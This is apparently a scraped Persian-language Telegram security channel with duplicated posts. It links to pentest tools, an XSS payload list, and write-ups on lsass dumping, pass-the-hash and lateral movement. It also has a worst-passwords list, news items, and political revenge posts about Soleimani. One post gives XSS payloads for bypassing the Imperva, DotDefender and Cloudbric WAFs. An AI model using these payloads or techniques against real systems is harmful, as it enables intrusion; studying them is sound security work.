htrace.sh is a shell script for http/https troubleshooting and profiling. It's also a simple wrapper around several open source security tools.
https://github.com/trimstray/htrace.sh
#tools
#enum
@sec_nerd
https://github.com/trimstray/htrace.sh
#tools
#enum
@sec_nerd
لیستی از پیلودهای مورد استفاده در حملات XSS
https://github.com/payloadbox/xss-payload-list
#xss
#bugbounty
#pentest
#web
@sec_nerd
https://github.com/payloadbox/xss-payload-list
#xss
#bugbounty
#pentest
#web
@sec_nerd
👍1
مطلبی از طرف مالک یک هانی پات ویندوزی با شرح مراحلی که یک هکر پس از نفوذ به ویندوز با استفاده از سرویس RDP طی کرده و با دامپ کردن lsass در عرض ۳۶ دقیقه موفق به رسیدن به دامین کنترلر شده
https://www.wilbursecurity.com/2019/12/from-zero-to-lateral-movement-in-36-minutes/
#windows
#pentest
#AD
#lateral_movement
#privesc
@sec_nerd
https://www.wilbursecurity.com/2019/12/from-zero-to-lateral-movement-in-36-minutes/
#windows
#pentest
#AD
#lateral_movement
#privesc
@sec_nerd
لیست ضعیف ترین پسوردهای سال ۲۰۱۹ در آخرین روز سال، برای تلنگر به کسانی که هنوز به پسوردشون اهمیت نمیدن!
1 – 123456
2 – 123456789
3 – qwerty
4 – password
5 – 1234567
6 – 12345678
7 – 12345
8 – iloveyou
9 – 111111
10 – 123123
11 – abc123
12 – qwerty123
13 – 1q2w3e4r
14 – admin
15 – qwertyuiop
16 – 654321
17 – 555555
18 – lovely
19 – 7777777
20 – welcome
21 – 888888
22 – princess
23 – dragon
24 – password1
25 – 123qwe
https://www.hackread.com/list-of-top-25-worst-passwords-of-2019/
#password
#security
@sec_nerd
1 – 123456
2 – 123456789
3 – qwerty
4 – password
5 – 1234567
6 – 12345678
7 – 12345
8 – iloveyou
9 – 111111
10 – 123123
11 – abc123
12 – qwerty123
13 – 1q2w3e4r
14 – admin
15 – qwertyuiop
16 – 654321
17 – 555555
18 – lovely
19 – 7777777
20 – welcome
21 – 888888
22 – princess
23 – dragon
24 – password1
25 – 123qwe
https://www.hackread.com/list-of-top-25-worst-passwords-of-2019/
#password
#security
@sec_nerd
HackRead
Here is a list of top 25 worst passwords of 2019
Like us on Facebook @ /HackRead
This media is not supported in your browser
VIEW IN TELEGRAM
https://blog.ropnop.com/practical-usage-of-ntlm-hashes/
روش های بکارگیری هش های NTLM
#windows
#pentest
#privesc
@sec_nerd
روش های بکارگیری هش های NTLM
#windows
#pentest
#privesc
@sec_nerd
ropnop blog
Practical Usage of NTLM Hashes
I’ve shown all the different ways to own a Windows environment when you have a password - but having a hash is just as good! Don’t bother cracking - PTH!
waf bypass
- Imperva
<a69/onclick=write()>pew
- DotDefender
<a69/onclick=[0].map(alert)>pew
- Cloudbric
<a69/onclick=[1].findIndex(alert)>pew
#bugbounty
#WAF
#pentest
@sec_nerd
- Imperva
<a69/onclick=write()>pew
- DotDefender
<a69/onclick=[0].map(alert)>pew
- Cloudbric
<a69/onclick=[1].findIndex(alert)>pew
#bugbounty
#WAF
#pentest
@sec_nerd
کشف ساب دامین با استفاده از Turbolist3r
https://github.com/fleetcaptain/Turbolist3r
#subdomain
#web
#pentest
@sec_nerd
https://github.com/fleetcaptain/Turbolist3r
#subdomain
#web
#pentest
@sec_nerd
با موضوع Search Hijacking چقدر آشنایی دارید؟
اخیرا مجموعه ای از شرکت های پوششی چینی کشف شده اند که در قالب افزونه های گوگل کروم و تحت عناوین سرچ امن و سرچ رمزنگاری شده و ... اقدام به هایجک کردن نتایج جستجوی کاربران میکنند.
این کمپین که افزونه های متعددی در گوگل دارد، نزدیک به ۷ میلیون کاربر را در جهان آلوده کرده و درآمدی نزدیک به ۲۵۰ میلیون دلار در سال از این طریق بدست آورده است.
روش کار بدین صورت است که کاربر با جستجوی یک عبارت منتظر دریافت نتایج از گوگل می ماند اما افزونه ی آلوده اقدام به دستکاری درخواست او کرده و برخی از تبلیغات مدنظر خود را به آن اضافه میکند و درخواست را به سمت مایکروسافت میفرستد. در این وضع موتور جستجوی مایکروسافت، هم نتایج جستجو را برمیگرداند و هم هزینه این تبلیغات را بدون آنکه اطلاعی داشته باشد به جیب کلاهبرداران میریزد.
تبلیغات مورد اشاره از شرکت های بزرگ امریکایی مانند آمازون، امریکن اکسپرس، کوکاکولا، اچ پی، والمارت و ... هستند و هربار کاربر باید در صفحات جستجوی خود تعداد زیادی از این تبلیغات را برای دیدن نتایج اصلی مدنظر پشت سر بگذارد.
اطلاعات و جزییات بیشتر:
https://medium.com/against-surveillance-capitalism/how-a-chinese-company-built-a-250-million-search-hijacking-empire-35f957566852
#news
#google
#chrome
#search_hijacking
@sec_nerd
#news
#search_hijacking
#google
#microsoft
@sec_nerd
اخیرا مجموعه ای از شرکت های پوششی چینی کشف شده اند که در قالب افزونه های گوگل کروم و تحت عناوین سرچ امن و سرچ رمزنگاری شده و ... اقدام به هایجک کردن نتایج جستجوی کاربران میکنند.
این کمپین که افزونه های متعددی در گوگل دارد، نزدیک به ۷ میلیون کاربر را در جهان آلوده کرده و درآمدی نزدیک به ۲۵۰ میلیون دلار در سال از این طریق بدست آورده است.
روش کار بدین صورت است که کاربر با جستجوی یک عبارت منتظر دریافت نتایج از گوگل می ماند اما افزونه ی آلوده اقدام به دستکاری درخواست او کرده و برخی از تبلیغات مدنظر خود را به آن اضافه میکند و درخواست را به سمت مایکروسافت میفرستد. در این وضع موتور جستجوی مایکروسافت، هم نتایج جستجو را برمیگرداند و هم هزینه این تبلیغات را بدون آنکه اطلاعی داشته باشد به جیب کلاهبرداران میریزد.
تبلیغات مورد اشاره از شرکت های بزرگ امریکایی مانند آمازون، امریکن اکسپرس، کوکاکولا، اچ پی، والمارت و ... هستند و هربار کاربر باید در صفحات جستجوی خود تعداد زیادی از این تبلیغات را برای دیدن نتایج اصلی مدنظر پشت سر بگذارد.
اطلاعات و جزییات بیشتر:
https://medium.com/against-surveillance-capitalism/how-a-chinese-company-built-a-250-million-search-hijacking-empire-35f957566852
#news
#chrome
#search_hijacking
@sec_nerd
#news
#search_hijacking
#microsoft
@sec_nerd
Medium
How a Chinese Company Built a $250 Million Search Hijacking Empire
A publicly listed Chinese company has used a series of offshore shell companies to conceal their ownership of browser extensions that…
رمزگشایی فایل کانفیگ روتر tplink در اولین روز سال میلادی
https://medium.com/@LargeCardinal/decrypting-config-bin-files-for-tp-link-wr841n-wa855re-and-probably-more-676de396d724
#tplink
#network
@sec_nerd
https://medium.com/@LargeCardinal/decrypting-config-bin-files-for-tp-link-wr841n-wa855re-and-probably-more-676de396d724
#tplink
#network
@sec_nerd
🏴 انالله واناالیه راجعون
♣️ مرثیه امیر مومنان (ع) در غم شهادت مالڪ
مالڪ ، مالڪ چه بود! به خدا سوگند، اگر ڪوه بود ڪوهے بلند و بے همتابود، واگر صخره بود صخره ا ے سخت بود ڪه هیچ ستورے بر آن بر نمے آمد وهیچ مرغے به اوج آن نمے رسید.( حڪمت ۴۴۳/ نهج البلاغه)
شهادت سردار دلها، حاج قاسم سلیمانی تسلیت باد.
@sec_nerd
♣️ مرثیه امیر مومنان (ع) در غم شهادت مالڪ
مالڪ ، مالڪ چه بود! به خدا سوگند، اگر ڪوه بود ڪوهے بلند و بے همتابود، واگر صخره بود صخره ا ے سخت بود ڪه هیچ ستورے بر آن بر نمے آمد وهیچ مرغے به اوج آن نمے رسید.( حڪمت ۴۴۳/ نهج البلاغه)
شهادت سردار دلها، حاج قاسم سلیمانی تسلیت باد.
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
حضرت امیرالمومنین علی(ع): سنگ دشمن را از همان جایی كه پرت كرده، باز گردانید، كه شر را جز شر پاسخی نیست.
نهج البلاغه، حکمت 314
#انتقام_سخت
#hardRevenge
#severeRevenge
نهج البلاغه، حکمت 314
#انتقام_سخت
#hardRevenge
#severeRevenge
آسیب پذیری موجود در محصولات Webex و IOS XE سیسکو منجر به اجرای دستور از راه دور میشود!
این آسیب پذیری بدلیل عدم حفاظت کافی در برابر CSRF ایجاد میشود.
https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/
#cisco
#news
@sec_nerd
این آسیب پذیری بدلیل عدم حفاظت کافی در برابر CSRF ایجاد میشود.
https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/
#cisco
#news
@sec_nerd
Threat Post
Cisco Webex Bug Allows Remote Code Execution
Cisco patched two high-severity flaws this week, in its Webex and IOS XE Software products.
یک نمونه از حمله علیه Citrix برای سوء استفاده از آسیب پذیری شناسه CVE-2019-19781
https://support.citrix.com/article/CTX267027
#citrix
#network
@sec_nerd
https://support.citrix.com/article/CTX267027
#citrix
#network
@sec_nerd